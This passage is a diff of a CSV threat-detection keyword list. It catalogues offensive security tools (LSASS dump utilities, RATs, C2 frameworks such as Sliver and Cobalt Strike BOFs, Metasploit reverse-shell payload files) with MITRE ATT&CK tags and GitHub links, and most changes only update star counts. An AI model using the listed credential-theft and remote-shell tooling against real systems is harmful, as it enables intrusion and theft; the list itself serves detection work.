Evasion","https://github.com/Signal-Labs/NtdllUnpatcher","1","1","N/A","10","2","142","30","2019-03-07T11:10:40Z","2019-03-07T10:20:19Z" -"*SigPloit*","offensive_tool_keyword","SigPloit","SigPloit a signaling security testing framework dedicated to Telecom Security professionals and reasearchers to pentest and exploit vulnerabilites in the signaling 
protocols used in mobile operators regardless of the geneartion being in use. SigPloit aims to cover all used protocols used in the operators interconnects SS7. GTP (3G). Diameter (4G) or even SIP for IMS and VoLTE infrastructures used in the access layer and SS7 message encapsulation into SIP-T. Recommendations for each vulnerability will be provided to guide the tester and the operator the steps that should be done to enhance their security posture","T1573 - T1562 - T1189 - T1190 - T1201","TA0002 - TA0003 - TA0007 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/SigPloiter/SigPloit","1","1","N/A","N/A","1","7","2","2019-12-17T16:51:23Z","2017-03-30T03:46:03Z" +"*SigPloit*","offensive_tool_keyword","SigPloit","SigPloit a signaling security testing framework dedicated to Telecom Security professionals and reasearchers to pentest and exploit vulnerabilites in the signaling protocols used in mobile operators regardless of the geneartion being in use. SigPloit aims to cover all used protocols used in the operators interconnects SS7. GTP (3G). Diameter (4G) or even SIP for IMS and VoLTE infrastructures used in the access layer and SS7 message encapsulation into SIP-T. Recommendations for each vulnerability will be provided to guide the tester and the operator the steps that should be done to enhance their security posture","T1573 - T1562 - T1189 - T1190 - T1201","TA0002 - TA0003 - TA0007 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/SigPloiter/SigPloit","1","1","N/A","N/A","1","7","3","2019-12-17T16:51:23Z","2017-03-30T03:46:03Z" "*sigthief.exe.manifest*","offensive_tool_keyword","metatwin","The project is designed as a file resource cloner. 
Metadata including digital signature is extracted from one file and injected into another","T1553.002 - T1114.001 - T1564.003","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/threatexpress/metatwin","1","0","N/A","9","4","303","72","2022-05-18T18:32:51Z","2017-10-08T13:26:00Z" -"*SigThief.py*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1356","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*SigThief.py*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" "*sigthief.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" "*SigThief-master*","offensive_tool_keyword","metatwin","The project is designed as a file resource cloner. 
Metadata including digital signature is extracted from one file and injected into another","T1553.002 - T1114.001 - T1564.003","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/threatexpress/metatwin","1","1","N/A","9","4","303","72","2022-05-18T18:32:51Z","2017-10-08T13:26:00Z" "*sigwhatever.exe*","offensive_tool_keyword","cobaltstrike","Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas","1","1","N/A","10","10","594","117","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" -"*Silent Lsass Dump*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - 
T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/guervild/BOFs","1","0","N/A","10","10","153","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z" +"*Silent Lsass Dump*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/guervild/BOFs","1","0","N/A","10","10","154","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z" 
"*silenthound.py*","offensive_tool_keyword","SilentHound","Quietly enumerate an Active Directory Domain via LDAP parsing users + admins + groups...","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/layer8secure/SilentHound","1","1","N/A","N/A","5","430","44","2023-01-23T20:41:55Z","2022-07-01T13:49:24Z" -"*silenthound_enum*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*silenthound_output_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*silenthound_enum*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*silenthound_output_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation 
Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" "*SilentHound-main*","offensive_tool_keyword","SilentHound","Quietly enumerate an Active Directory Domain via LDAP parsing users + admins + groups...","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/layer8secure/SilentHound","1","1","N/A","N/A","5","430","44","2023-01-23T20:41:55Z","2022-07-01T13:49:24Z" -"*silentLsassDump*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/guervild/BOFs","1","1","N/A","10","10","153","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z" +"*silentLsassDump*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - 
T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/guervild/BOFs","1","1","N/A","10","10","154","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z" "*SilentMoonwalk.cpp*","offensive_tool_keyword","SilentMoonwalk","PoC Implementation of a fully dynamic call stack spoofer","T1055 - T1055.012 - T1562 - T1562.001 - T1070 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/klezVirus/SilentMoonwalk","1","1","N/A","9","6","507","84","2022-12-08T10:01:41Z","2022-12-04T13:30:33Z" "*SilentMoonwalk.exe*","offensive_tool_keyword","SilentMoonwalk","PoC Implementation of a fully dynamic call stack spoofer","T1055 - T1055.012 - T1562 - T1562.001 - T1070 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/klezVirus/SilentMoonwalk","1","1","N/A","9","6","507","84","2022-12-08T10:01:41Z","2022-12-04T13:30:33Z" "*SilentMoonwalk.sln*","offensive_tool_keyword","SilentMoonwalk","PoC Implementation of a fully dynamic call stack spoofer","T1055 - T1055.012 - T1562 - T1562.001 - T1070 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/klezVirus/SilentMoonwalk","1","1","N/A","9","6","507","84","2022-12-08T10:01:41Z","2022-12-04T13:30:33Z" 
"*SilentMoonwalk-master*","offensive_tool_keyword","SilentMoonwalk","PoC Implementation of a fully dynamic call stack spoofer","T1055 - T1055.012 - T1562 - T1562.001 - T1070 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/klezVirus/SilentMoonwalk","1","1","N/A","9","6","507","84","2022-12-08T10:01:41Z","2022-12-04T13:30:33Z" -"*SilentProcessExitRegistrySetter.cpp*","offensive_tool_keyword","LsassSilentProcessExit","Command line interface to dump LSASS memory to disk via SilentProcessExit","T1003.001 - T1059.003","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/deepinstinct/LsassSilentProcessExit","1","1","N/A","10","5","421","64","2020-12-23T11:51:21Z","2020-11-29T08:49:42Z" -"*SilentProcessExitRegistrySetter.exe*","offensive_tool_keyword","LsassSilentProcessExit","Command line interface to dump LSASS memory to disk via SilentProcessExit","T1003.001 - T1059.003","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/deepinstinct/LsassSilentProcessExit","1","1","N/A","10","5","421","64","2020-12-23T11:51:21Z","2020-11-29T08:49:42Z" +"*SilentProcessExitRegistrySetter.cpp*","offensive_tool_keyword","LsassSilentProcessExit","Command line interface to dump LSASS memory to disk via SilentProcessExit","T1003.001 - T1059.003","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/deepinstinct/LsassSilentProcessExit","1","1","N/A","10","5","422","64","2020-12-23T11:51:21Z","2020-11-29T08:49:42Z" +"*SilentProcessExitRegistrySetter.exe*","offensive_tool_keyword","LsassSilentProcessExit","Command line interface to dump LSASS memory to disk via SilentProcessExit","T1003.001 - T1059.003","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/deepinstinct/LsassSilentProcessExit","1","1","N/A","10","5","422","64","2020-12-23T11:51:21Z","2020-11-29T08:49:42Z" "*SILENTTRINITY*","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. 
multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","0","N/A","N/A","10","2070","413","2023-07-08T19:10:18Z","2018-09-25T15:17:30Z" "*silenttrinity*.dll*","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). 
The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","10","2070","413","2023-07-08T19:10:18Z","2018-09-25T15:17:30Z" "*SillyRAT.git*","offensive_tool_keyword","SillyRAT","A Cross Platform multifunctional (Windows/Linux/Mac) RAT.","T1055.003 - T1027 - T1105 - T1005","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/hash3liZer/SillyRAT","1","1","N/A","N/A","6","594","151","2023-06-23T18:49:43Z","2020-05-10T17:37:37Z" "*sillyrat.py*","offensive_tool_keyword","SillyRAT","A Cross Platform multifunctional (Windows/Linux/Mac) RAT.","T1055.003 - T1027 - T1105 - T1005","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/hash3liZer/SillyRAT","1","1","N/A","N/A","6","594","151","2023-06-23T18:49:43Z","2020-05-10T17:37:37Z" -"*silver*/beacon.go*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" -"*silver*implant.go*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - 
T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" +"*silver*/beacon.go*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*silver*implant.go*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" "*SilverPoision*","offensive_tool_keyword","Github Username","Github username hosting exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/SilverPoision","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*SilverPoision/Rock-ON*","offensive_tool_keyword","Rock-ON","Rock-On is a all in one recon tool that will help your Recon process give a boost. It is mainley aimed to automate the whole process of recon and save the time that is being wasted in doing all this stuffs manually. A thorough blog will be up in sometime. 
Stay tuned for the Stable version with a UI","T1590 - T1210.001 - T1190 - T1213","TA0007 - TA0002 - TA0003","N/A","N/A","Information Gathering","https://github.com/SilverPoision/Rock-ON","1","1","N/A","N/A","3","288","70","2019-11-30T04:00:03Z","2019-06-10T04:42:32Z" "*SimoneLazzaris/ditty*","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SimoneLazzaris/ditty","1","1","N/A","N/A","1","2","1","2022-03-10T16:15:14Z","2022-03-09T09:20:27Z" 
@@ -16936,22 +17119,22 @@ "*SimplyEmail.py*","offensive_tool_keyword","SimplyEmail","SimplyEmail was built arround the concept that tools should do somthing. and do that somthing well. hence simply What is the simple email recon tool? This tool was based off the work of theHarvester and kind of a port of the functionality. This was just an expansion of what was used to build theHarvester and will incorporate his work but allow users to easily build Modules for the Framework. Which I felt was desperately needed after building my first module for theHarvester.","T1210.001 - T1190 - T1583.001 - T1590","TA0007 - TA0002 - ","N/A","N/A","Reconnaissance","https://github.com/SimplySecurity/SimplyEmail","1","1","N/A","5","10","918","242","2023-01-12T22:20:25Z","2015-10-30T03:12:10Z" "*SimplyEmail-master*","offensive_tool_keyword","SimplyEmail","SimplyEmail was built arround the concept that tools should do somthing. and do that somthing well. hence simply What is the simple email recon tool? This tool was based off the work of theHarvester and kind of a port of the functionality. This was just an expansion of what was used to build theHarvester and will incorporate his work but allow users to easily build Modules for the Framework. Which I felt was desperately needed after building my first module for theHarvester.","T1210.001 - T1190 - T1583.001 - T1590","TA0007 - TA0002 - ","N/A","N/A","Reconnaissance","https://github.com/SimplySecurity/SimplyEmail","1","1","N/A","5","10","918","242","2023-01-12T22:20:25Z","2015-10-30T03:12:10Z" "*SimplySecurity/SimplyEmail*","offensive_tool_keyword","SimplyEmail","SimplyEmail was built arround the concept that tools should do somthing. and do that somthing well. hence simply What is the simple email recon tool? This tool was based off the work of theHarvester and kind of a port of the functionality. 
This was just an expansion of what was used to build theHarvester and will incorporate his work but allow users to easily build Modules for the Framework. Which I felt was desperately needed after building my first module for theHarvester.","T1210.001 - T1190 - T1583.001 - T1590","TA0007 - TA0002 - ","N/A","N/A","Reconnaissance","https://github.com/SimplySecurity/SimplyEmail","1","1","N/A","5","10","918","242","2023-01-12T22:20:25Z","2015-10-30T03:12:10Z" -"*single_reverse_tcp_shell.s*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*single_shell_bind_tcp.asm*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. 
and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*single_shell_reverse_tcp.asm*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*single_target_exploit.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. 
exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*sipdump2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*single_reverse_tcp_shell.s*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*single_shell_bind_tcp.asm*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*single_shell_reverse_tcp.asm*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. 
and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*single_target_exploit.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
